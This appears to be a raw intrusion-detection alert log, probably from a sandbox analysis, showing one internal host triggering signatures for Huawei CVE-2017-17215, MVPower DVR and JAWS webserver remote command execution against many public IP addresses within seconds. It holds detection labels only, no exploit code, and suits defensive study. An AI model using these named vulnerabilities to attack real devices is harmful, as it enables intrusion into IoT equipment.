                    06/01/24-18:15:54.238439TCP2025883ET EXPLOIT MVPower DVR Shell UCE3620880192.168.2.23147.135.44.218
                    06/01/24-18:15:54.255075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987437215192.168.2.2341.147.35.71
                    06/01/24-18:15:55.272495TCP2025883ET EXPLOIT MVPower DVR Shell UCE4579480192.168.2.2385.180.164.31
                    06/01/24-18:15:56.246218TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4793880192.168.2.2352.6.122.212
                    06/01/24-18:15:56.287840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483237215192.168.2.23197.91.191.231
                    06/01/24-18:15:56.305703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000237215192.168.2.23197.169.240.113
                    06/01/24-18:15:56.244111TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5350880192.168.2.23177.237.184.162
                    06/01/24-18:15:54.251062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865837215192.168.2.2341.164.227.208
                    06/01/24-18:15:55.260737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322637215192.168.2.23197.146.75.139
                    06/01/24-18:15:55.261704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926837215192.168.2.23197.115.193.139
                    06/01/24-18:15:56.307768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998437215192.168.2.23197.205.140.173
                    06/01/24-18:15:53.241794TCP2025883ET EXPLOIT MVPower DVR Shell UCE5729880192.168.2.2324.4.140.180
                    06/01/24-18:15:53.247238TCP2025883ET EXPLOIT MVPower DVR Shell UCE4337480192.168.2.23112.217.71.237
                    06/01/24-18:15:54.252358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970037215192.168.2.2341.139.183.232
                    06/01/24-18:15:54.252388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319637215192.168.2.23156.58.214.28
                    06/01/24-18:15:53.238572TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5675680192.168.2.23174.194.105.235
                    06/01/24-18:15:53.247074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4514680192.168.2.2398.220.77.102
                    06/01/24-18:15:54.274230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514837215192.168.2.23156.122.9.247
                    06/01/24-18:15:54.254379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422637215192.168.2.2341.74.251.91
                    06/01/24-18:15:55.260550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811637215192.168.2.2341.248.71.190
                    06/01/24-18:15:55.266850TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3811280192.168.2.2371.91.49.115
                    06/01/24-18:15:56.254790TCP2025883ET EXPLOIT MVPower DVR Shell UCE3915480192.168.2.23195.190.120.96
                    06/01/24-18:15:55.259084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411637215192.168.2.23197.227.44.103
                    06/01/24-18:15:55.261460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200037215192.168.2.2341.32.165.26
                    06/01/24-18:15:55.267894TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5633280192.168.2.23116.245.119.93
                    06/01/24-18:15:53.241729TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3449280192.168.2.23123.28.179.254
                    06/01/24-18:15:55.259125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325637215192.168.2.23156.182.240.81
                    06/01/24-18:15:56.244458TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4631680192.168.2.23117.23.22.23
                    06/01/24-18:15:53.241765TCP2025883ET EXPLOIT MVPower DVR Shell UCE5082480192.168.2.2387.130.72.182
                    06/01/24-18:15:54.238811TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5677480192.168.2.23145.92.78.73
                    06/01/24-18:15:55.265151TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5124880192.168.2.23171.183.227.124
                    06/01/24-18:15:56.246558TCP2025883ET EXPLOIT MVPower DVR Shell UCE4026080192.168.2.2339.154.44.113
                    06/01/24-18:15:55.260401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374037215192.168.2.23197.163.157.253
                    06/01/24-18:15:54.238030TCP2025883ET EXPLOIT MVPower DVR Shell UCE5574080192.168.2.2350.27.20.241
                    06/01/24-18:15:54.275349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491237215192.168.2.2341.247.195.212
                    06/01/24-18:15:53.240154TCP2025883ET EXPLOIT MVPower DVR Shell UCE3942080192.168.2.2331.70.83.31
                    06/01/24-18:15:55.265381TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5589080192.168.2.23201.27.217.106
                    06/01/24-18:15:55.258740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957437215192.168.2.2341.37.164.26
                    06/01/24-18:15:55.266672TCP2025883ET EXPLOIT MVPower DVR Shell UCE5694480192.168.2.2396.101.32.166
                    06/01/24-18:15:54.253905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.23156.145.248.27
                    06/01/24-18:15:55.259243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412637215192.168.2.23197.16.225.51
                    06/01/24-18:15:54.252981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049437215192.168.2.23156.68.148.229
                    06/01/24-18:15:55.262106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867237215192.168.2.2341.144.238.83
                    06/01/24-18:15:53.240463TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3771480192.168.2.23206.121.1.240
                    06/01/24-18:15:55.267969TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6087480192.168.2.2350.45.43.167
                    06/01/24-18:15:55.262860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725037215192.168.2.2341.230.149.194
                    06/01/24-18:15:55.267641TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4843680192.168.2.23119.233.198.220
                    06/01/24-18:15:53.241078TCP2025883ET EXPLOIT MVPower DVR Shell UCE5521680192.168.2.2351.180.72.227
                    06/01/24-18:15:54.275510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877237215192.168.2.23197.231.220.22
                    06/01/24-18:15:54.275830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026237215192.168.2.23197.97.177.91
                    06/01/24-18:15:55.272091TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3330480192.168.2.23117.221.193.160
                    06/01/24-18:15:54.275098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921837215192.168.2.2341.27.121.67
                    06/01/24-18:15:56.255251TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4771280192.168.2.2387.44.98.223
                    06/01/24-18:15:56.307898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5418437215192.168.2.2341.8.69.158
                    06/01/24-18:15:55.261204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242637215192.168.2.23156.177.250.156
                    06/01/24-18:15:53.239887TCP2025883ET EXPLOIT MVPower DVR Shell UCE5418080192.168.2.23222.84.171.34
                    06/01/24-18:15:55.263691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729437215192.168.2.2341.24.234.239
                    06/01/24-18:15:54.252700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771637215192.168.2.23197.148.143.218
                    06/01/24-18:15:53.237931TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4474280192.168.2.2381.132.76.122
                    06/01/24-18:15:55.268368TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3742680192.168.2.2388.57.152.134
                    06/01/24-18:15:54.253358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242037215192.168.2.2341.169.149.73
                    06/01/24-18:15:54.256311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297437215192.168.2.2341.13.222.141
                    06/01/24-18:15:54.255877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413037215192.168.2.23156.151.10.77
                    06/01/24-18:15:54.255917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408637215192.168.2.23156.123.221.185
                    06/01/24-18:15:54.238762TCP2025883ET EXPLOIT MVPower DVR Shell UCE3514080192.168.2.2324.72.9.82
                    06/01/24-18:15:55.264980TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4643080192.168.2.2353.177.52.181
                    06/01/24-18:15:55.266621TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3989280192.168.2.23193.247.242.227
                    06/01/24-18:15:54.240566TCP2025883ET EXPLOIT MVPower DVR Shell UCE4147280192.168.2.23213.46.243.209
                    06/01/24-18:15:54.253312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629037215192.168.2.23197.25.244.85
                    06/01/24-18:15:53.241529TCP2025883ET EXPLOIT MVPower DVR Shell UCE5865480192.168.2.2389.243.242.221
                    06/01/24-18:15:54.239076TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3331880192.168.2.2367.147.165.34
                    06/01/24-18:15:54.275905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584237215192.168.2.2341.42.3.37
                    06/01/24-18:15:54.251796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756637215192.168.2.2341.179.71.43
                    06/01/24-18:15:56.245386TCP2025883ET EXPLOIT MVPower DVR Shell UCE5468480192.168.2.2337.201.193.121
                    06/01/24-18:15:55.261842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937437215192.168.2.23197.244.184.156
                    06/01/24-18:15:56.308392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020437215192.168.2.23197.159.189.243
                    06/01/24-18:15:54.256434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402037215192.168.2.23197.204.247.193
                    06/01/24-18:15:56.306634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601437215192.168.2.23156.35.92.138
                    06/01/24-18:15:55.260686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773237215192.168.2.23156.1.199.155
                    06/01/24-18:15:55.266938TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6096280192.168.2.2348.6.53.216
                    06/01/24-18:15:54.254529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957237215192.168.2.23197.229.155.141
                    06/01/24-18:15:54.239370TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5047480192.168.2.2339.24.219.249
                    06/01/24-18:15:54.241602TCP2025883ET EXPLOIT MVPower DVR Shell UCE3758880192.168.2.23212.34.153.120
                    06/01/24-18:15:54.275742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006837215192.168.2.2341.186.161.206
                    06/01/24-18:15:55.266558TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5590680192.168.2.2360.237.234.86
                    06/01/24-18:15:53.238346TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5114280192.168.2.23149.127.43.235
                    06/01/24-18:15:54.256517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530237215192.168.2.23197.177.223.221
                    06/01/24-18:15:55.264950TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5073880192.168.2.23175.110.145.206
                    06/01/24-18:15:55.263651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496237215192.168.2.2341.163.26.210
                    06/01/24-18:15:54.253534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395437215192.168.2.23156.91.55.119
                    06/01/24-18:15:56.307074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885037215192.168.2.23197.35.163.130
                    06/01/24-18:15:55.260266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029437215192.168.2.23156.164.69.210
                    06/01/24-18:15:56.244182TCP2025883ET EXPLOIT MVPower DVR Shell UCE5647680192.168.2.2336.17.37.52
                    06/01/24-18:15:54.238560TCP2025883ET EXPLOIT MVPower DVR Shell UCE4319680192.168.2.2360.224.142.1
                    06/01/24-18:15:54.273948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746237215192.168.2.2341.90.29.90
                    06/01/24-18:15:55.260509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010437215192.168.2.2341.146.68.75
                    06/01/24-18:15:54.240412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3551680192.168.2.23209.98.115.136
                    06/01/24-18:15:54.273650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.2341.136.53.187
                    06/01/24-18:15:54.274543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888837215192.168.2.23197.107.164.239
                    06/01/24-18:15:56.244830TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5496880192.168.2.2390.145.31.137
                    06/01/24-18:15:56.246394TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3377280192.168.2.23141.114.69.138
                    06/01/24-18:15:56.244662TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5225880192.168.2.23185.108.7.250
                    06/01/24-18:15:56.244374TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3883680192.168.2.2319.188.175.96
                    06/01/24-18:15:56.307552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062237215192.168.2.23197.5.152.126
                    06/01/24-18:15:54.274464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547037215192.168.2.2341.101.61.245
                    06/01/24-18:15:55.265477TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5941080192.168.2.23206.32.126.218
                    06/01/24-18:15:54.253379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804837215192.168.2.23197.126.155.107
                    06/01/24-18:15:54.255789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584037215192.168.2.23156.152.96.204
                    06/01/24-18:15:55.262354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703037215192.168.2.23197.210.56.52
                    06/01/24-18:15:54.253732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960837215192.168.2.23156.3.243.152
                    06/01/24-18:15:54.255976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103637215192.168.2.23156.69.248.105
                    06/01/24-18:15:53.247444TCP2025883ET EXPLOIT MVPower DVR Shell UCE3842680192.168.2.2325.119.127.189
                    06/01/24-18:15:53.241044TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4554080192.168.2.23144.192.66.230
                    06/01/24-18:15:54.251192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736637215192.168.2.23156.33.225.228
                    06/01/24-18:15:56.308533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550837215192.168.2.23156.141.78.170
                    06/01/24-18:15:54.274260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003237215192.168.2.23156.42.136.63
                    06/01/24-18:15:53.238659TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3584280192.168.2.2383.231.82.8
                    06/01/24-18:15:54.252168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919437215192.168.2.23156.227.20.171
                    06/01/24-18:15:56.254604TCP2025883ET EXPLOIT MVPower DVR Shell UCE5193080192.168.2.23188.65.236.49
                    06/01/24-18:15:54.237830TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3648080192.168.2.23137.234.162.150
                    06/01/24-18:15:53.241576TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4526680192.168.2.2350.235.115.106
                    06/01/24-18:15:53.239684TCP2025883ET EXPLOIT MVPower DVR Shell UCE4099280192.168.2.2352.206.114.48
                    06/01/24-18:15:54.238640TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5303280192.168.2.2353.223.178.64
                    06/01/24-18:15:55.263203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054637215192.168.2.23156.58.71.89
                    06/01/24-18:15:54.254259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980637215192.168.2.23197.33.181.12
                    06/01/24-18:15:55.263437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464237215192.168.2.23156.23.230.69
                    06/01/24-18:15:55.267467TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5186880192.168.2.23134.253.46.5
                    06/01/24-18:15:54.254454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753037215192.168.2.23156.234.39.13
                    06/01/24-18:15:54.256952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714837215192.168.2.2341.238.177.50
                    06/01/24-18:15:56.288015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120437215192.168.2.2341.66.66.141
                    06/01/24-18:15:54.274796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042837215192.168.2.23197.99.171.142
                    06/01/24-18:15:55.266347TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4515680192.168.2.23124.126.158.225
                    06/01/24-18:15:55.261256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647037215192.168.2.2341.215.248.219
                    06/01/24-18:15:54.287413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089237215192.168.2.2341.54.77.148
                    06/01/24-18:15:54.240600TCP2025883ET EXPLOIT MVPower DVR Shell UCE3812280192.168.2.23149.39.112.106
                    06/01/24-18:15:54.241554TCP2025883ET EXPLOIT MVPower DVR Shell UCE4364080192.168.2.23123.15.159.153
                    06/01/24-18:15:55.266713TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5078680192.168.2.23170.144.103.21
                    06/01/24-18:15:54.237960TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4160680192.168.2.2324.179.173.118
                    06/01/24-18:15:56.307937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802637215192.168.2.2341.116.27.9
                    06/01/24-18:15:53.241504TCP2025883ET EXPLOIT MVPower DVR Shell UCE5470880192.168.2.23173.142.129.181
                    06/01/24-18:15:56.255002TCP2025883ET EXPLOIT MVPower DVR Shell UCE5528880192.168.2.23135.144.55.37
                    06/01/24-18:15:56.307586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.23197.199.175.95
                    06/01/24-18:15:54.240074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3830680192.168.2.2387.233.87.119
                    06/01/24-18:15:53.241186TCP2025883ET EXPLOIT MVPower DVR Shell UCE4292680192.168.2.23173.201.55.115
                    06/01/24-18:15:54.239931TCP2025883ET EXPLOIT MVPower DVR Shell UCE3569280192.168.2.23211.152.213.185
                    06/01/24-18:15:56.246953TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4801880192.168.2.23146.123.63.93
                    06/01/24-18:15:53.241304TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4206680192.168.2.23198.139.79.120
                    06/01/24-18:15:54.253050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440237215192.168.2.2341.152.169.18
                    06/01/24-18:15:53.246833TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4780480192.168.2.23161.166.48.249
                    06/01/24-18:15:56.246876TCP2025883ET EXPLOIT MVPower DVR Shell UCE4941280192.168.2.2386.86.105.40
                    06/01/24-18:15:54.253169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129637215192.168.2.23197.189.238.220
                    06/01/24-18:15:54.251714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545237215192.168.2.2341.61.54.93
                    06/01/24-18:15:56.255180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3281880192.168.2.23158.200.167.191
                    06/01/24-18:15:54.252117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620437215192.168.2.2341.37.220.142
                    06/01/24-18:15:54.274985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996637215192.168.2.23197.239.222.81
                    06/01/24-18:15:54.239112TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5346680192.168.2.2395.127.175.227
                    06/01/24-18:15:56.307106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168037215192.168.2.23156.208.181.92
                    06/01/24-18:15:55.265828TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5322480192.168.2.23102.77.238.93
                    06/01/24-18:15:54.252555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960037215192.168.2.23197.171.180.102
                    06/01/24-18:15:55.261076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.2341.191.51.126
                    06/01/24-18:15:54.275278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616037215192.168.2.23156.221.125.6
                    06/01/24-18:15:54.274661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869437215192.168.2.2341.95.142.163
                    06/01/24-18:15:55.231937TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5991680192.168.2.23223.93.215.58
                    06/01/24-18:15:55.266035TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3470080192.168.2.2396.191.196.7
                    06/01/24-18:15:54.275029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224637215192.168.2.2341.73.11.125
                    06/01/24-18:15:54.239986TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4496880192.168.2.23176.78.160.138
                    06/01/24-18:15:56.245550TCP2025883ET EXPLOIT MVPower DVR Shell UCE4135480192.168.2.23122.96.155.142
                    06/01/24-18:15:56.307965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149237215192.168.2.23197.90.12.37
                    06/01/24-18:15:54.239284TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5315480192.168.2.23206.73.46.114
                    06/01/24-18:15:56.246172TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5826880192.168.2.2392.66.196.17
                    06/01/24-18:15:54.275592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849637215192.168.2.2341.103.71.244
                    06/01/24-18:15:56.245947TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5291280192.168.2.23118.247.151.83
                    06/01/24-18:15:53.240726TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5084680192.168.2.2350.8.69.255
                    06/01/24-18:15:54.254417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354437215192.168.2.2341.244.158.164
                    06/01/24-18:15:53.240394TCP2025883ET EXPLOIT MVPower DVR Shell UCE4944280192.168.2.23124.60.75.137
                    06/01/24-18:15:53.239412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5428480192.168.2.23110.176.150.43
                    06/01/24-18:15:55.259969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379437215192.168.2.23156.84.73.50
                    06/01/24-18:15:56.308506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203237215192.168.2.2341.32.190.153
                    06/01/24-18:15:53.238700TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4726480192.168.2.2357.222.230.206
                    06/01/24-18:15:56.287004TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3942080192.168.2.238.213.71.177
                    06/01/24-18:15:54.254489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037837215192.168.2.23156.88.210.161
                    06/01/24-18:15:54.255235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097837215192.168.2.23156.158.221.167
                    06/01/24-18:15:54.256393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661437215192.168.2.23156.158.95.158
                    06/01/24-18:15:55.267489TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4255480192.168.2.2332.79.28.244
                    06/01/24-18:15:54.275795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768437215192.168.2.23197.116.0.109
                    06/01/24-18:15:55.262801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386237215192.168.2.23197.162.38.43
                    06/01/24-18:15:54.252202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101437215192.168.2.23156.167.5.201
                    06/01/24-18:15:54.238961TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3735080192.168.2.2366.47.79.133
                    06/01/24-18:15:55.272559TCP2025883ET EXPLOIT MVPower DVR Shell UCE5519080192.168.2.2377.114.121.8
                    06/01/24-18:15:55.267046TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5508280192.168.2.2349.30.76.125
                    06/01/24-18:15:54.256722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261637215192.168.2.2341.56.241.40
                    06/01/24-18:15:53.239285TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4605880192.168.2.2351.243.182.171
                    06/01/24-18:15:54.254976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605037215192.168.2.23156.13.177.93
                    06/01/24-18:15:56.244879TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4476880192.168.2.2327.59.60.107
                    06/01/24-18:15:56.305877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492437215192.168.2.2341.219.48.227
                    06/01/24-18:15:55.261159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766837215192.168.2.2341.223.205.90
                    06/01/24-18:15:54.240296TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4458880192.168.2.23176.104.168.239
                    06/01/24-18:15:56.306811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675637215192.168.2.23156.208.201.65
                    06/01/24-18:15:55.263479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514437215192.168.2.2341.0.162.73
                    06/01/24-18:15:54.252592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172437215192.168.2.2341.87.170.8
                    06/01/24-18:15:54.255840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403837215192.168.2.23156.42.21.62
                    06/01/24-18:15:54.256242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577837215192.168.2.23197.46.115.89
                    06/01/24-18:15:54.274865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.23156.95.177.47
                    06/01/24-18:15:54.252084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.23197.159.210.112
